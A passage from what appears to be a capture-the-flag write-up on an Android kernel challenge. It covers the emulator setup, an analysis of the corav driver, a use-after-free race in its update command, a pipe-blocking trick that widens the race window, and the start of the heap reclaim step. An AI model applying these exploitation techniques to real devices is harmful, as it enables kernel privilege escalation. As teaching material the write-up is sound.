        <span class="o">-</span><span class="n">initramfs_path</span> <span class="o">/</span><span class="n">root</span><span class="o">/</span><span class="n">kernel</span><span class="o">/</span><span class="n">initramfs</span><span class="p">.</span><span class="n">img</span> \
        <span class="o">-</span><span class="n">kernel_path</span> <span class="o">/</span><span class="n">root</span><span class="o">/</span><span class="n">kernel</span><span class="o">/</span><span class="n">bzImage</span> \
        <span class="o">-</span><span class="n">report_anonymous_usage_stats</span><span class="o">=</span><span class="n">n</span> \
        <span class="o">-</span><span class="n">cpus</span><span class="o">=</span><span class="mi">4</span> \
        <span class="o">-</span><span class="n">memory_mb</span><span class="o">=</span><span class="mi">4096</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Next, the instance is set up. This includes patching SELinux rules so the target device can be accessed by the untrusted application, installing applications, and forwarding the backdoor and ADB ports.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>corphone_setup<span class="o">()</span> <span class="o">{</span>
    adb connect 127.0.0.1:<span class="nv">$ADB_PORT</span>

    <span class="c">####### allow_corav_access() #######</span>
    adb shell su 0 /system/bin/chmod 0644 /dev/corav
    adb push /root/image/magiskpolicy /data/local/tmp/m <span class="o">&gt;</span>/dev/null 2&gt;&amp;1
    adb shell <span class="s1">'su 0 chcon u:object_r:corav_device:s0 /dev/corav'</span> <span class="o">&gt;</span>/dev/null 2&gt;&amp;1
    adb shell <span class="s1">'su 0 /data/local/tmp/m --live "type corav_device"'</span>
    adb shell <span class="s1">'su 0 /data/local/tmp/m --live "allow untrusted_app corav_device chr_file open"'</span>
    adb shell <span class="s1">'su 0 /data/local/tmp/m --live "allow untrusted_app corav_device chr_file read"'</span>
    adb shell <span class="s1">'su 0 /data/local/tmp/m --live "allow untrusted_app corav_device chr_file ioctl"'</span>
    adb shell <span class="s1">'su 0 /data/local/tmp/m --print-rules | grep corav || echo Error'</span>
    adb shell <span class="s1">'su 0 rm /data/local/tmp/m'</span>

    <span class="c">####### install apk #######</span>
    <span class="c">### am: Activity Manager, pm: Package Manager</span>
    adb <span class="nb">install</span> /root/image/bd.apk
    adb shell am force-stop com.example.notabackdoor2
    adb shell pm grant com.example.notabackdoor2 android.permission.ACCESS_COARSE_LOCATION
    adb shell pm grant com.example.notabackdoor2 android.permission.ACCESS_BACKGROUND_LOCATION
    adb shell am start <span class="nt">-n</span> com.example.notabackdoor2/com.example.notabackdoor2.MainActivity

    <span class="c"># [...]</span>

    <span class="c">####### forward network #######</span>
    <span class="c">### adb</span>
    socat TCP-LISTEN:6666,fork,reuseaddr,bind<span class="o">=</span>0.0.0.0 TCP:127.0.0.1:6520 &amp;
    
    <span class="c">### apk</span>
    adb <span class="nt">-a</span> forward tcp:6969 tcp:6969 <span class="o">&gt;</span> /dev/null 2&gt;&amp;1
    socat TCP-LISTEN:1337,fork,reuseaddr,bind<span class="o">=</span>0.0.0.0 TCP:127.0.0.1:6969 <span class="c"># become frontend process</span>
<span class="o">}</span>
</code></pre></div></div>

<p>In the end, we can connect to <code class="language-plaintext highlighter-rouge">container-ip:1337</code> from the host to interact with the backdoor application:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aaa@aaa:~<span class="nv">$ </span>nc 172.17.0.2 1337
 | Backdoor | Say the magic word:
</code></pre></div></div>

<p>We can also connect to <code class="language-plaintext highlighter-rouge">container-ip:6666</code> to obtain a shell:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aaa@aaa:~<span class="nv">$ </span>adb connect 172.17.0.2:6666
connected to 172.17.0.2:6666

aaa@aaa:~<span class="nv">$ </span>adb shell
vsoc_x86_64_only:/ <span class="err">$</span>
</code></pre></div></div>

<h2 id="2-challenge">2. Challenge</h2>

<h3 id="21-analyze">2.1. Analyze</h3>

<p>The <code class="language-plaintext highlighter-rouge">corav.diff</code> patch implements an access vector device at <code class="language-plaintext highlighter-rouge">/dev/corav</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">miscdevice</span> <span class="n">corav_misc</span> <span class="o">=</span> <span class="p">{</span>
    <span class="p">.</span><span class="n">minor</span> <span class="o">=</span> <span class="n">MISC_DYNAMIC_MINOR</span><span class="p">,</span>
    <span class="p">.</span><span class="n">name</span>  <span class="o">=</span> <span class="s">"corav"</span><span class="p">,</span>
    <span class="p">.</span><span class="n">fops</span>  <span class="o">=</span> <span class="o">&amp;</span><span class="n">corav_fops</span><span class="p">,</span>
    <span class="p">.</span><span class="n">mode</span>  <span class="o">=</span> <span class="mo">0644</span><span class="p">,</span>
<span class="p">};</span>

<span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">file_operations</span> <span class="n">corav_fops</span> <span class="o">=</span> <span class="p">{</span>
    <span class="p">.</span><span class="n">owner</span>          <span class="o">=</span> <span class="n">THIS_MODULE</span><span class="p">,</span>
    <span class="p">.</span><span class="n">unlocked_ioctl</span> <span class="o">=</span> <span class="n">corav_ioctl</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>

<p>The ioctl handler expects the user to pass a <code class="language-plaintext highlighter-rouge">struct corav_user_entry</code> object as a parameter. This structure contains a file signature, a set of flags (<code class="language-plaintext highlighter-rouge">risk</code>, <code class="language-plaintext highlighter-rouge">root_only</code>), and a file path.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">corav_user_entry</span> <span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">sig</span><span class="p">;</span>
    <span class="k">enum</span> <span class="n">corav_risk</span> <span class="n">risk</span><span class="p">;</span>
    <span class="n">bool</span> <span class="n">root_only</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">path</span><span class="p">[</span><span class="n">CORAV_MAX_PATH_SIZE</span><span class="p">];</span>
<span class="p">};</span>
</code></pre></div></div>

<p>There are three commands: <code class="language-plaintext highlighter-rouge">CORCTL_INSERT</code>, <code class="language-plaintext highlighter-rouge">CORCTL_UPDATE</code>, and <code class="language-plaintext highlighter-rouge">CORCTL_DELETE</code>.</p>

<p>The first command, <code class="language-plaintext highlighter-rouge">CORCTL_INSERT</code>, is handled by <code class="language-plaintext highlighter-rouge">corav_insert()</code>. This function reads up to 512 bytes from the specified file, allocates a <code class="language-plaintext highlighter-rouge">struct corav_entry</code> object, and stores it in a bucket. Finally, it returns the file signature to the user as an identifier for the entry.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">long</span> <span class="nf">corav_insert</span><span class="p">(</span><span class="k">struct</span> <span class="n">corav_user_entry</span> <span class="o">*</span><span class="n">ue</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">out</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">corav_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">sig</span><span class="p">;</span>
    <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>

    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_calc_file_content_sig_from_path</span><span class="p">(</span><span class="n">ue</span><span class="o">-&gt;</span><span class="n">path</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">e</span> <span class="o">=</span> <span class="n">corav_alloc_entry</span><span class="p">(</span><span class="n">ue</span><span class="p">,</span> <span class="n">sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_insert_entry_locked</span><span class="p">(</span><span class="n">e</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="o">*</span><span class="n">out</span> <span class="o">=</span> <span class="n">sig</span><span class="p">;</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The second command, <code class="language-plaintext highlighter-rouge">CORCTL_UPDATE</code>, is handled by <code class="language-plaintext highlighter-rouge">corav_update()</code>. This function first looks up the existing <code class="language-plaintext highlighter-rouge">corav_entry</code> by its signature. It then reads the file, calculates a new signature, and updates the entry with the new signature and flags.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">long</span> <span class="nf">corav_update</span><span class="p">(</span><span class="k">struct</span> <span class="n">corav_user_entry</span> <span class="o">*</span><span class="n">ue</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">out</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">old_sig</span> <span class="o">=</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">sig</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">corav_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">new_sig</span><span class="p">;</span>
    <span class="kt">long</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>

    <span class="n">e</span> <span class="o">=</span> <span class="n">corav_lockup_entry_locked</span><span class="p">(</span><span class="n">old_sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_calc_file_content_sig_from_path</span><span class="p">(</span><span class="n">ue</span><span class="o">-&gt;</span><span class="n">path</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">new_sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_update_entry_locked</span><span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="n">new_sig</span><span class="p">,</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">risk</span><span class="p">,</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">root_only</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="o">*</span><span class="n">out</span> <span class="o">=</span> <span class="n">new_sig</span><span class="p">;</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The third command, <code class="language-plaintext highlighter-rouge">CORCTL_DELETE</code>, is handled by <code class="language-plaintext highlighter-rouge">corav_remove()</code>. This function reads the file at the specified path, calculates its signature, and looks up the corresponding entry. If the entry is found, it is removed from the bucket and released.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">long</span> <span class="nf">corav_remove</span><span class="p">(</span><span class="k">struct</span> <span class="n">corav_user_entry</span> <span class="o">*</span><span class="n">ue</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">out</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">corav_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">sig</span><span class="p">;</span>
    <span class="kt">long</span> <span class="n">ret</span><span class="p">;</span>

    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_calc_file_content_sig_from_path</span><span class="p">(</span><span class="n">ue</span><span class="o">-&gt;</span><span class="n">path</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">e</span> <span class="o">=</span> <span class="n">corav_remove_entry_locked</span><span class="p">(</span><span class="n">sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">corav_free_entry</span><span class="p">(</span><span class="n">e</span><span class="p">);</span>

    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This built-in driver also registers a hook function, <code class="language-plaintext highlighter-rouge">corav_scan()</code>, at the LSM hook point <code class="language-plaintext highlighter-rouge">bprm_check_security</code> (the same hook framework that SELinux is built on).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="n">__init</span> <span class="nf">corav_selinux_init</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">security_add_hooks</span><span class="p">(</span><span class="n">corav_hooks</span><span class="p">,</span> <span class="n">ARRAY_SIZE</span><span class="p">(</span><span class="n">corav_hooks</span><span class="p">),</span> <span class="s">"corav"</span><span class="p">);</span>
<span class="p">}</span>

<span class="k">static</span> <span class="k">struct</span> <span class="n">security_hook_list</span> <span class="n">corav_hooks</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span>
    <span class="n">LSM_HOOK_INIT</span><span class="p">(</span><span class="n">bprm_check_security</span><span class="p">,</span> <span class="n">corav_scan</span><span class="p">),</span>
<span class="p">};</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">corav_scan()</code> function performs a sanitization check whenever <code class="language-plaintext highlighter-rouge">SYS_execve</code> is invoked. First, it prevents the root user from executing certain hardcoded binaries, such as <code class="language-plaintext highlighter-rouge">/bin/sh</code> (which explains why <code class="language-plaintext highlighter-rouge">adb shell su 0 sh</code> always fails).</p>

<p>After that, it calculates the signature of the binary being executed and looks up the corresponding entry. If the entry is not found, execution is allowed; otherwise, the function either returns the error code <code class="language-plaintext highlighter-rouge">-EACCES</code> or directly kills the process.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">corav_scan</span><span class="p">(</span><span class="k">struct</span> <span class="n">linux_binprm</span> <span class="o">*</span><span class="n">bprm</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Hardcoded binaries check</span>
    <span class="c1">// [...]</span>

    <span class="c1">// [...]</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_calc_file_content_sig</span><span class="p">(</span><span class="n">bprm</span><span class="o">-&gt;</span><span class="n">file</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">sig</span><span class="p">);</span>

    <span class="c1">// [...]</span>
    <span class="n">e</span> <span class="o">=</span> <span class="n">corav_lockup_entry_locked</span><span class="p">(</span><span class="n">sig</span><span class="p">);</span>

    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">e</span><span class="o">-&gt;</span><span class="n">risk</span> <span class="o">&gt;=</span> <span class="n">RISK_MODERATE</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// [...]</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">EACCES</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">e</span><span class="o">-&gt;</span><span class="n">risk</span> <span class="o">&gt;=</span> <span class="n">RISK_HIGH</span><span class="p">)</span>
        <span class="n">send_sig_info</span><span class="p">(</span><span class="n">SIGKILL</span><span class="p">,</span> <span class="n">SEND_SIG_NOINFO</span><span class="p">,</span> <span class="n">current</span><span class="p">);</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>
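
<p>To make the policy easier to follow, here is a minimal user-space sketch of the decision described above. It is not the driver's code: the <code class="language-plaintext highlighter-rouge">RISK_LOW</code> member and the enum ordering are assumptions (the snippet only shows <code class="language-plaintext highlighter-rouge">RISK_MODERATE</code> and <code class="language-plaintext highlighter-rouge">RISK_HIGH</code>), <code class="language-plaintext highlighter-rouge">struct scan_result</code> and <code class="language-plaintext highlighter-rouge">scan_decision()</code> are hypothetical names, and the elided parts (the hardcoded binary check and anything involving <code class="language-plaintext highlighter-rouge">root_only</code>) are left out.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;errno.h&gt;
#include &lt;stdbool.h&gt;
#include &lt;stddef.h&gt;

/* Assumed ordering; the post only names RISK_MODERATE and RISK_HIGH. */
enum corav_risk { RISK_LOW, RISK_MODERATE, RISK_HIGH };

/* Hypothetical result type for this sketch. */
struct scan_result {
    int  ret;   /* value handed back to the exec path: 0 or -EACCES */
    bool kill;  /* true where the driver would send SIGKILL */
};

/* entry_risk == NULL models "no entry found for this signature". */
static struct scan_result scan_decision(const enum corav_risk *entry_risk)
{
    struct scan_result r = { 0, false };

    if (entry_risk == NULL)
        return r;                 /* unknown binary: execution is allowed */
    if (*entry_risk &gt;= RISK_MODERATE)
        r.ret = -EACCES;          /* moderate or worse: exec is denied */
    if (*entry_risk &gt;= RISK_HIGH)
        r.kill = true;            /* high: the caller is killed as well */
    return r;
}
</code></pre></div></div>

<p>Under these assumptions, a binary with no entry or with a low-risk entry runs normally, a moderate entry only fails the exec, and a high entry both fails the exec and kills the calling process.</p>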

<h3 id="22-vulnerability">2.2. Vulnerability</h3>

<p>Delving into the internal implementation, we found that the lookup function <code class="language-plaintext highlighter-rouge">corav_lockup_entry_locked()</code>, the insert function <code class="language-plaintext highlighter-rouge">corav_insert_entry_locked()</code>, the update function <code class="language-plaintext highlighter-rouge">corav_update_entry_locked()</code>, and the remove function <code class="language-plaintext highlighter-rouge">corav_remove_entry_locked()</code> are all invoked with the lock held. Taken one at a time, each of them appears correct and should not cause any issues. (While writing this post, I realized the first one should be named <code class="language-plaintext highlighter-rouge">lookup_entry_locked()</code> rather than lockup xD.)</p>

<p>However, in <code class="language-plaintext highlighter-rouge">corav_update()</code>, the entire update process <strong>acquires the lock twice</strong>. It first retrieves the entry while holding the lock, then releases the lock before reading data from the file, and finally acquires the lock again to update the entry. Between the two critical sections, <strong>the entry may be freed by another thread</strong>, so the second step works on a dangling pointer. This is a use-after-free on <code class="language-plaintext highlighter-rouge">struct corav_entry</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">long</span> <span class="nf">corav_update</span><span class="p">(</span><span class="k">struct</span> <span class="n">corav_user_entry</span> <span class="o">*</span><span class="n">ue</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">out</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">old_sig</span> <span class="o">=</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">sig</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">corav_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">new_sig</span><span class="p">;</span>
    <span class="kt">long</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>

    <span class="n">e</span> <span class="o">=</span> <span class="n">corav_lockup_entry_locked</span><span class="p">(</span><span class="n">old_sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_calc_file_content_sig_from_path</span><span class="p">(</span><span class="n">ue</span><span class="o">-&gt;</span><span class="n">path</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">new_sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>

    <span class="c1">// At this point, the entry `e` may already have been freed.</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_update_entry_locked</span><span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="n">new_sig</span><span class="p">,</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">risk</span><span class="p">,</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">root_only</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="o">*</span><span class="n">out</span> <span class="o">=</span> <span class="n">new_sig</span><span class="p">;</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
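<p>To make the window concrete, here is a small user-space model of the same "lookup, unlock, blocking work, relock" sequence. It is only a sketch: <code class="language-plaintext highlighter-rouge">model_update()</code>, the fixed-size <code class="language-plaintext highlighter-rouge">table</code>, and the <code class="language-plaintext highlighter-rouge">window</code> callback (which stands in for the blocking file read) are names invented for illustration and are not part of the challenge module. Unlike the vulnerable function, the model looks the entry up again by signature in the second critical section instead of reusing the earlier pointer, which is one possible way to avoid touching a freed entry.</p>

```c
#include <errno.h>
#include <pthread.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

#define SLOTS 8

struct entry {
    uint64_t sig;
};

static pthread_mutex_t table_lock = PTHREAD_MUTEX_INITIALIZER;
static struct entry *table[SLOTS];

/* Signature removed by racing_remove(); set by the caller (hypothetical helper). */
uint64_t racing_sig;

/* Caller must hold table_lock. */
static struct entry **find_slot(uint64_t sig)
{
    for (size_t i = 0; i < SLOTS; i++)
        if (table[i] && table[i]->sig == sig)
            return &table[i];
    return NULL;
}

int model_insert(uint64_t sig)
{
    int ret = -ENOSPC;

    pthread_mutex_lock(&table_lock);
    if (find_slot(sig)) {
        ret = -EEXIST;
        goto out;
    }
    for (size_t i = 0; i < SLOTS; i++) {
        if (table[i])
            continue;
        table[i] = malloc(sizeof(*table[i]));
        if (!table[i]) {
            ret = -ENOMEM;
            break;
        }
        table[i]->sig = sig;
        ret = 0;
        break;
    }
out:
    pthread_mutex_unlock(&table_lock);
    return ret;
}

int model_remove(uint64_t sig)
{
    struct entry **slot;
    int ret = -ENOENT;

    pthread_mutex_lock(&table_lock);
    slot = find_slot(sig);
    if (slot) {
        free(*slot);
        *slot = NULL;
        ret = 0;
    }
    pthread_mutex_unlock(&table_lock);
    return ret;
}

/* Plays the role of the other thread that deletes the entry in the window. */
void racing_remove(void)
{
    model_remove(racing_sig);
}

int model_update(uint64_t old_sig, uint64_t new_sig, void (*window)(void))
{
    struct entry **slot;
    int ret = -ENOENT;

    /* First critical section: only check that the entry exists. */
    pthread_mutex_lock(&table_lock);
    slot = find_slot(old_sig);
    pthread_mutex_unlock(&table_lock);
    if (!slot)
        return -ENOENT;

    /* Lock dropped: this models the blocking file read. */
    if (window)
        window();

    /* Second critical section: look the entry up again before touching it. */
    pthread_mutex_lock(&table_lock);
    slot = find_slot(old_sig);
    if (slot) {
        (*slot)->sig = new_sig;
        ret = 0;
    }
    pthread_mutex_unlock(&table_lock);
    return ret;
}
```

<p>With <code class="language-plaintext highlighter-rouge">racing_remove()</code> passed as the window, the update returns <code class="language-plaintext highlighter-rouge">-ENOENT</code> rather than writing into freed memory; with no interference it behaves like a normal update.</p>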

<p>Although the time window is small and the race is hard to win, we can widen it by examining how <code class="language-plaintext highlighter-rouge">corav_calc_file_content_sig_from_path()</code> works: it eventually calls <code class="language-plaintext highlighter-rouge">kernel_read()</code> to read data, which can block.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">corav_calc_file_content_sig_from_path</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">path</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">sig</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">f</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">ret</span><span class="p">;</span>

    <span class="n">f</span> <span class="o">=</span> <span class="n">filp_open</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_calc_file_content_sig</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">sig</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">filp_close</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">corav_calc_file_content_sig</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">f</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">sig</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">char</span> <span class="n">data</span><span class="p">[</span><span class="n">CORAV_SAMPLE_SIZE</span> <span class="cm">/* 512 */</span><span class="p">];</span>
    <span class="n">loff_t</span> <span class="n">pos</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="kt">long</span> <span class="n">bytes</span><span class="p">;</span>

    <span class="n">bytes</span> <span class="o">=</span> <span class="n">kernel_read</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">CORAV_SAMPLE_SIZE</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pos</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="o">*</span><span class="n">sig</span> <span class="o">=</span> <span class="n">corav_hash64</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">bytes</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

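<p>By passing a pipe via <code class="language-plaintext highlighter-rouge">/proc/self/fd/&lt;pipe_fd&gt;</code> to <code class="language-plaintext highlighter-rouge">corav_update()</code>, we can fully control the race condition: <code class="language-plaintext highlighter-rouge">kernel_read()</code> blocks on the empty pipe until we write to it, so the window stays open for as long as we need. This makes the exploit much more stable.</p>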
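<p>The gating behaviour can be observed from user space. The sketch below re-opens the read end of a pipe through <code class="language-plaintext highlighter-rouge">/proc/self/fd</code>, the same kind of path that would be handed to the driver. As an assumption made purely so the demo does not hang, it opens the path with <code class="language-plaintext highlighter-rouge">O_NONBLOCK</code>: an <code class="language-plaintext highlighter-rouge">EAGAIN</code> result marks the point where a blocking reader such as <code class="language-plaintext highlighter-rouge">kernel_read()</code> would sleep. The function name <code class="language-plaintext highlighter-rouge">pipe_gate_demo()</code> is hypothetical.</p>

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Returns 0 if the read stalls while the pipe is empty and completes
 * once a byte has been written, -1 otherwise. */
int pipe_gate_demo(void)
{
    int pfd[2];
    char path[64];
    char byte = 0;
    int rfd;
    int ret = -1;

    if (pipe(pfd) < 0)
        return -1;

    /* Same path shape as the one passed to the update command. */
    snprintf(path, sizeof(path), "/proc/self/fd/%d", pfd[0]);
    rfd = open(path, O_RDONLY | O_NONBLOCK);
    if (rfd < 0)
        goto out;

    /* Empty pipe: a blocking reader would sleep here. */
    if (read(rfd, &byte, 1) != -1 || errno != EAGAIN)
        goto out_rfd;

    /* Writing one byte releases the reader. */
    if (write(pfd[1], "A", 1) != 1)
        goto out_rfd;
    if (read(rfd, &byte, 1) == 1 && byte == 'A')
        ret = 0;

out_rfd:
    close(rfd);
out:
    close(pfd[0]);
    close(pfd[1]);
    return ret;
}
```

<p>In an exploit, the write would be issued by a second thread only after the entry has been deleted and reclaimed, which turns a narrow race into a deterministic sequence.</p>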

<h2 id="3-exploitation">3. Exploitation</h2>

<h3 id="31-reclaim-the-free-entry">3.1. Reclaim the Freed Entry</h3>

<p>Once the race is won, we can assume that the entry <code class="language-plaintext highlighter-rouge">e</code> has already been freed by the time <code class="language-plaintext highlighter-rouge">corav_update_entry_locked()</code> runs. This function first calls <code class="language-plaintext highlighter-rouge">corav_verify_entry()</code> to validate the entry and then calls <code class="language-plaintext highlighter-rouge">corav_update_entry()</code> to update the old entry.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">corav_update_entry_locked</span><span class="p">(</span><span class="k">struct</span> <span class="n">corav_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">sig</span><span class="p">,</span> <span class="k">enum</span> <span class="n">corav_risk</span> <span class="n">risk</span><span class="p">,</span> <span class="n">bool</span> <span class="n">root_only</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">corav_bucket</span> <span class="o">*</span><span class="n">old_b</span> <span class="o">=</span> <span class="n">corav_stob</span><span class="p">(</span><span class="n">e</span><span class="o">-&gt;</span><span class="n">sig</span><span class="p">);</span>
    <span class="k">struct</span> <span class="n">corav_bucket</span> <span class="o">*</span><span class="n">new_b</span> <span class="o">=</span> <span class="n">corav_stob</span><span class="p">(</span><span class="n">sig</span><span class="p">);</span>
    <span class="kt">int</span> <span class="n">ret</span><span class="p">;</span>

    <span class="c1">// Do some lock operations</span>
    <span class="c1">// [...]</span>

    <span class="n">corav_verify_entry</span><span class="p">(</span><span class="n">e</span><span class="p">);</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_update_entry</span><span class="p">(</span><span class="n">old_b</span><span class="p">,</span> <span class="n">new_b</span><span class="p">,</span> <span class="n">e</span><span class="p">,</span> <span class="n">sig</span><span class="p">,</span> <span class="n">risk</span><span class="p">,</span> <span class="n">root_only</span><span class="p">);</span>

    <span class="c1">// Do some unlock operations</span>
    <span class="c1">// [...]</span>

    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">corav_update_entry()</code> removes the entry from the original bucket (implemented as an rbtree), updates several fields, and inserts it into another rbtree, which leaves the freed entry object reachable for later accesses.</p>

